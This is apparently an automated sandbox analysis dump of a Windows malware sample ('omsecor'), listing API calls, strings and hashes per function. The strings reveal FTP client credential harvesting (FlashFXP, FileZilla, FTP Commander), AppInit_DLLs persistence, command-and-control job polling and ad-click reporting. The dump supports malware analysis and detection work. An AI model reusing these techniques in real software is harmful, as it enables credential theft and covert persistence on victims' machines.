                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$FileLocalSystemTimerWaitable$CloseCreateHandleInformationObjectSingleWaitZone
                          • String ID:
                          • API String ID: 3166187867-0
                          • Opcode ID: 8616424921b6ce0bb56b9c9dfbc93343bf37786535cdacee7c7c77324956f8a5
                          • Instruction ID: 26b14636c49f8a61fb06fac8b942a3fa68f3078aba47330515a101c34858e503
                          • Opcode Fuzzy Hash: 8616424921b6ce0bb56b9c9dfbc93343bf37786535cdacee7c7c77324956f8a5
                          • Instruction Fuzzy Hash: 8B316FB2D1022DAACF04EBE5DD459EEB7BDEF44304F10406AF901B3290E7746A04DB69
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
                          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: EnvironmentExpandFolderOpenPathStrings
                          • String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
                          • API String ID: 1994525040-4055253781
                          • Opcode ID: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                          • Instruction ID: b84aa35a929ccb2802933dbb7828156d7819aaa5c632eb2dc8c8e19af11b7673
                          • Opcode Fuzzy Hash: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                          • Instruction Fuzzy Hash: 203130B2900118AADB10EAA5DC85DDF7BBCEB44718F10847BF605F3180EA399B458B69
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 004099EB
                          • SysAllocString.OLEAUT32(?), ref: 004099F9
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: </domain>$</url>$<domain>$<url>$http://
                          • API String ID: 2525500382-924421446
                          • Opcode ID: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                          • Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
                          • Opcode Fuzzy Hash: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                          • Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99
                          APIs
                          • SysFreeString.OLEAUT32(75C0F6A0), ref: 00408F82
                          • SysFreeString.OLEAUT32(0000000B), ref: 00409046
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID:
                          • API String ID: 3341692771-0
                          • Opcode ID: f1232823454a9de15ab73cfed205648ff3cd14be94bb6ef3f987156c3e0446fe
                          • Instruction ID: f0e6d8e47a3946ab2c5de92fa7688d846ddd73d58da4f3d2da06902102303575
                          • Opcode Fuzzy Hash: f1232823454a9de15ab73cfed205648ff3cd14be94bb6ef3f987156c3e0446fe
                          • Instruction Fuzzy Hash: A0616C70A0020AEFDB10DFA9DA845AEBBB2FB48304F2048BAD545F7251D7795E52DF08
                          APIs
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
                          • Sleep.KERNEL32(0000EA60), ref: 0040AD76
                          • Sleep.KERNEL32(00002710), ref: 0040ADA4
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$AttemptConnectInternet
                          • String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
                          • API String ID: 362191241-2593661552
                          • Opcode ID: c6d12f3f342631a53f4ba21eed34aabb8925de89328c1543a1445e18d084db7e
                          • Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
                          • Opcode Fuzzy Hash: c6d12f3f342631a53f4ba21eed34aabb8925de89328c1543a1445e18d084db7e
                          • Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004088E4
                          • SysFreeString.OLEAUT32(?), ref: 004088E9
                          • SysFreeString.OLEAUT32(?), ref: 004089D3
                          • SysFreeString.OLEAUT32(?), ref: 004089D8
                          • SysFreeString.OLEAUT32(?), ref: 004089F3
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID: +@
                          • API String ID: 3341692771-3835504741
                          • Opcode ID: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                          • Instruction ID: a3ddab01b40b0bc50fc9c7e4bf61c95a679aea40eaf3a0ce7d8bcb6f132c7745
                          • Opcode Fuzzy Hash: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                          • Instruction Fuzzy Hash: BB518171900219AFDF05BFA1CC45AEF7BB8EF08308F00447AF855B6192EB799A51CB59
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004094E6
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID:
                          • API String ID: 3341692771-0
                          • Opcode ID: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                          • Instruction ID: b8745a711dcf8da59f3798694fa3079dcf63c40c9cdbadd59c4d39193402e254
                          • Opcode Fuzzy Hash: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                          • Instruction Fuzzy Hash: C9214832A00108BBDB01DFAADC44B9E7BB8EF48345F1484B6E805F71A1D774AE41DB84
                          APIs
                          • _memset.LIBCMT ref: 0040A26B
                          • SysAllocString.OLEAUT32(?), ref: 0040A28E
                          • SysAllocString.OLEAUT32(?), ref: 0040A296
                          • SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
                          • SysFreeString.OLEAUT32(?), ref: 0040A2CF
                            • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
                            • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
                            • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                            • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                            • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
                          • String ID: J(@
                          • API String ID: 3143865713-2848800318
                          • Opcode ID: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                          • Instruction ID: bfa1c3e5fdaec5be4dfb18607c12502589e7fd5433bac8caf4aacda455aa0499
                          • Opcode Fuzzy Hash: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                          • Instruction Fuzzy Hash: 3A118F72D10219ABCB00DFA9DD448DEBBB9FF08354B11456AF415B7290E770AE14CFA4
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?,?,00000000), ref: 00408628
                          • GetLastError.KERNEL32(?,00000000), ref: 0040864A
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          • DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll,?,00000000), ref: 00408687
                            • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
                          • String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
                          • API String ID: 4026185228-3265104503
                          • Opcode ID: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                          • Instruction ID: 1689b80d2e7b4165945397198c320d7ed833f5e108bfbebac4dfc06446509e60
                          • Opcode Fuzzy Hash: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                          • Instruction Fuzzy Hash: 99014CB2A44124B6E62067665E06F9B72AC9B00750F220D7BF905F31C0DABA9D1446AD
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 00409B00
                          • SysAllocString.OLEAUT32(?), ref: 00409B0E
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: </title>$</url>$<title>$<url>
                          • API String ID: 2525500382-2286408829
                          • Opcode ID: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                          • Instruction ID: e94fff7a9c4556839c155ffec7726d55edf757161a42396596b5093e86978141
                          • Opcode Fuzzy Hash: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                          • Instruction Fuzzy Hash: 4F01DB7564021CA7DB116A55CC41FD637A8BB44799F044077FA04F32C3E978AA0C4BA4
                          APIs
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • Sleep.KERNEL32(00002710,?,?,?,?,00402C8F,00000032,00000000,00000000,00000000,00000000,?), ref: 0040A91C
                          • Sleep.KERNEL32(00002710), ref: 0040AAC1
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AAE9
                          • HeapFree.KERNEL32(00000000), ref: 0040AAF0
                          Strings
                          • 0, xrefs: 0040AA5B
                          • jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: HeapSleep$AttemptConnectFreeInternetProcess
                          • String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
                          • API String ID: 3713053250-1268808612
                          • Opcode ID: b149150f67450d10939e037a4072d5df3dc9b6793fc6db3c061519f1f12da8b2
                          • Instruction ID: cb73c9a78e41fc00613c6eff30345c36a412e41c8c720ed22b53be089701fd16
                          • Opcode Fuzzy Hash: b149150f67450d10939e037a4072d5df3dc9b6793fc6db3c061519f1f12da8b2
                          • Instruction Fuzzy Hash: 88515072A00218A6CF10EB95DC959DF737DEF44308F40447BF406B7281EB789A958FAA
                          APIs
                          • GetLocalTime.KERNEL32(?,?), ref: 004074AD
                          • GetLocalTime.KERNEL32(00000000), ref: 004074B3
                          • GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 3777474486-0
                          • Opcode ID: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                          • Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
                          • Opcode Fuzzy Hash: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                          • Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5
                          APIs
                          • CoInitialize.OLE32(00000000), ref: 0040A0C0
                          • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,0040A16F,00427ED0,00000000,00000001,?,00402806,?), ref: 0040A0CE
                          • CreateWindowExW.USER32(00000000,AtlAxWin,Shell.Explorer,80000000,00000000,00000000,000004B0,00000320,00000000,00000000,00000000), ref: 0040A0F3
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CreateHandleInitializeModuleWindow
                          • String ID: AtlAxWin$Shell.Explorer
                          • API String ID: 950422046-1300462704
                          • Opcode ID: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                          • Instruction ID: 8885d0d040d3ab3e1edd42f45155a7fe84e7bff231f75e8e802cb7627400a982
                          • Opcode Fuzzy Hash: e9b6661190c81bdf072f7cb3f1dc159ab5559684b807faa4a04e62d0e94038f2
                          • Instruction Fuzzy Hash: 78118F30200200FFD320ABA6CC4CE6B7BBCEFCA711B240579F515EB291D7789801CA65
                          APIs
                          • GetSystemTime.KERNEL32(?,?,000003E8,?,?,?,?,?,?,?,?,?,?,?,00407B63,?), ref: 0040727C
                          • SystemTimeToFileTime.KERNEL32(?,?,?,000003E8,?), ref: 004072C1
                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 004072CB
                          • __aulldiv.LIBCMT ref: 004072E3
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$System$File$__aulldiv
                          • String ID: c{@
                          • API String ID: 3735792614-264719814
                          • Opcode ID: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                          • Instruction ID: ef19eb4ac8525f4bf2260e0142840e6d018c3cac6eb9bd4f47b1f5cd165e8a78
                          • Opcode Fuzzy Hash: a145c05d1847671377470c3096bfc685d9fda3d476ef25e64420ea8c3ac11d0d
                          • Instruction Fuzzy Hash: D401DE62D1022DAACB01DFE4D984CEFB77DFF44348B00156AE901F7250E7B5AA4887A5
                          APIs
                          • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040286E), ref: 004072F9
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00407337
                          • SystemTimeToFileTime.KERNEL32(000007B2,?), ref: 00407341
                          • __aulldiv.LIBCMT ref: 00407359
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$System$File$__aulldiv
                          • String ID: n(@
                          • API String ID: 3735792614-2525614082
                          • Opcode ID: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                          • Instruction ID: 0875687ad9f8fbdff1f190dbab39d4211c2ed1a8acd2afdabfbd9ccbaffc37b8
                          • Opcode Fuzzy Hash: fb9972a15ff1dd7e61217f7ff9a5823acba4978d5a12943579487cf22718de7c
                          • Instruction Fuzzy Hash: 83011A66D2022DAACF00DBE5DD44CEFB7BCFF44344B04051AE901B3210E7B5A648CBA9
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400), ref: 0040AB93
                          • CharLowerW.USER32(?), ref: 0040ABA0
                          • GetCommandLineW.KERNEL32 ref: 0040ABC0
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CharCommandFileLineLowerModuleName
                          • String ID: /updatefile3$netprotdrvss.exe
                          • API String ID: 3118597399-3449771660
                          • Opcode ID: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                          • Instruction ID: 1eba2a713c21f7c79877a49aa3ec6850c44e44909145826ab611dd80b60fa5a6
                          • Opcode Fuzzy Hash: a9092c2346d55b23f20d8634028d89874de2ded0d1b8197c9b1551ea588aa001
                          • Instruction Fuzzy Hash: 41E09B3655021A5AD750FBB1DD07BA633ACFB01705F1049B6A246F10C0EE74D55D4F9D
                          APIs
                            • Part of subcall function 0040A469: InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040A535
                            • Part of subcall function 0040A469: InternetSetOptionW.WININET(00000000,00000041,00000000,00000004), ref: 0040A551
                            • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5B
                            • Part of subcall function 00409F2B: GetTickCount.KERNEL32 ref: 00409F5F
                            • Part of subcall function 00409F2B: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409F72
                            • Part of subcall function 00409F2B: DispatchMessageW.USER32(?), ref: 00409F80
                            • Part of subcall function 00409F2B: Sleep.KERNEL32(0000012C,?,?,?,?,00000000), ref: 00409F8D
                          • CharLowerW.USER32(?,?,?,00423DD4,?,00000001), ref: 00408751
                          • SysFreeString.OLEAUT32(?), ref: 0040875A
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CountInternetMessageTick$CharDispatchFreeLowerOpenOptionPeekSleepString
                          • String ID: http://$+@
                          • API String ID: 147727044-3628382792
                          • Opcode ID: 6e9e626a4613c0855f5347982540e942ed1617b6e834c0e4f94aa1f1be06abb5
                          • Instruction ID: 305e6509dfdc939f3ffb47eba37a7af79922f54013ecb7534e3961c93d2e4cc1
                          • Opcode Fuzzy Hash: 6e9e626a4613c0855f5347982540e942ed1617b6e834c0e4f94aa1f1be06abb5
                          • Instruction Fuzzy Hash: 4E41D5729002199BCF15AF66CD056EFBBB4FF44314F20447FE981B3292DB3889528B99
                          APIs
                          • SetFilePointer.KERNEL32(00414F68,00000000,00000000,00000000,UniqueNum,00000001), ref: 00407E09
                          • WriteFile.KERNEL32(00000078,00000064,00000001,00000000), ref: 00407E20
                            • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                            • Part of subcall function 00407CD7: CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateModuleNamePointerWrite
                          • String ID: UniqueNum$x
                          • API String ID: 594998759-2399716736
                          • Opcode ID: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                          • Instruction ID: 8c5cde1ed6458afa5e70834db293a7f07ca8c6efd1b8e13f0da2095665a79c5a
                          • Opcode Fuzzy Hash: 0d1cac2645660f3edc8ae4858b9aa10093ebf6a3be27c46c4cc389029dd9494e
                          • Instruction Fuzzy Hash: F72129329002186BDF04AB74ED49DDF3B69EF44315F104636FA02E71E1E634D951C799
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 0040413A
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: #$&$*filezilla*
                          • API String ID: 3438805939-758400021
                          • Opcode ID: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                          • Instruction ID: af0dd5899ef73ee7264a7e51d90439c8fcf38b6470501fb51340e8e2557856c3
                          • Opcode Fuzzy Hash: 7f420262a527ace9c0fec2a61cbcbac63df6dda7f3825d1df3812bb47b8bab04
                          • Instruction Fuzzy Hash: 8E1151B2901128BADB10EA92DC49EDF7BBCEF85304F00407AF605B6080E7385785CBE9
                          APIs
                          • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?,?,00000000,00000008), ref: 00404AE5
                            • Part of subcall function 00408248: FindFirstFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00408280
                            • Part of subcall function 00408248: WaitForSingleObject.KERNEL32(?,00000000), ref: 004082A6
                            • Part of subcall function 00408248: PathMatchSpecW.SHLWAPI(0000002E,00000000), ref: 00408310
                            • Part of subcall function 00408248: Sleep.KERNEL32(00000000), ref: 00408377
                            • Part of subcall function 00408248: FindNextFileW.KERNEL32(00000000,00000010), ref: 004083A8
                            • Part of subcall function 00408248: FindClose.KERNEL32(00000000), ref: 004083B9
                            • Part of subcall function 0040BE3A: HeapFree.KERNEL32(00000000,00000000,0040384E), ref: 0040BE4D
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Find$FilePath$CloseFirstFolderFreeHeapMatchNextObjectSingleSleepSpecWait
                          • String ID: #$&$ftp*commander*
                          • API String ID: 3438805939-1149875651
                          • Opcode ID: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                          • Instruction ID: 4761086559ade70d73b1403ca51e5d3bc462c500c99379e4fd01d7d946a964d6
                          • Opcode Fuzzy Hash: 371d79112eeabe7a5308543586f4c365cccc6d4de9a1601f9ce447be0e8ea6cb
                          • Instruction Fuzzy Hash: B61121B2901118BADB10AA92DC49EDF7F7CEF85704F00407AF609B6180E7799785CBA9
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004094A9
                          • SysFreeString.OLEAUT32(?), ref: 004094AE
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID: _blank$an.yandex.ru/count
                          • API String ID: 3341692771-25359924
                          • Opcode ID: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                          • Instruction ID: 1eacecae91598e8b756cf85833a4a3bbf756f1dfdfc5fa02fd6c22f827bf3b29
                          • Opcode Fuzzy Hash: 4ab6eb577aae85ed23f24708000ea2df93b57f18851f250654f87edd31753785
                          • Instruction Fuzzy Hash: 28015A35204114BBDB109FA6CD05D9B77A8EF85324724443BBC15E7291E779EE02CA69
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 00409868
                          • SysAllocString.OLEAUT32(?), ref: 00409876
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: "URL"$"encrypted"
                          • API String ID: 2525500382-4151690107
                          • Opcode ID: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                          • Instruction ID: 961e294ab5ae80d7ab2f0271a6faa46f3ea3f555f1d55132cdad114d364c87da
                          • Opcode Fuzzy Hash: f6e867073f93e28a707ce71cee5b1d0d556dab41e30d3c647449298916898aec
                          • Instruction Fuzzy Hash: 62F0D671A0021DA7CF00AB69CC01FD637ECAB4438CF1484B6F904F32C1E974EA098B98
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Internet Explorer,00000000,00000001,00000000,?,?,00402C77), ref: 00406C91
                          Strings
                          Memory Dump Source
                          • Source File: 0000001C.00000002.2589397988.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_28_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Open
                          • String ID: Build$SOFTWARE\Microsoft\Internet Explorer$w,@
                          • API String ID: 71445658-3061378640
                          • Opcode ID: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                          • Instruction ID: 930cfdd3d9e2cf302383723a85cc45ac24d6ba1b6d45bcf7a76994dd36721e6e
                          • Opcode Fuzzy Hash: 340e09b6331f5021cec00f630817528513552a638f53ca028bdc246a1c5cc706
                          • Instruction Fuzzy Hash: FBE08672664218FAEF009B929C07FDA77ACDB00758F20086AF502F10C1DAB5F714D6AC
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                            • Part of subcall function 0040845D: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000008,00000000,?,?,004084C5,?,?,?,00000008,?,00403796,?), ref: 00408475
                            • Part of subcall function 0040845D: RegCloseKey.ADVAPI32(?,?,004084C5,?,?,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408484
                          • ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000008,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408524
                          • GetProcessHeap.KERNEL32(00000000,00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 00408534
                          • HeapFree.KERNEL32(00000000,?,00403796,?,?,00000104,?,00000000,00000008), ref: 0040853B
                          Memory Dump Source
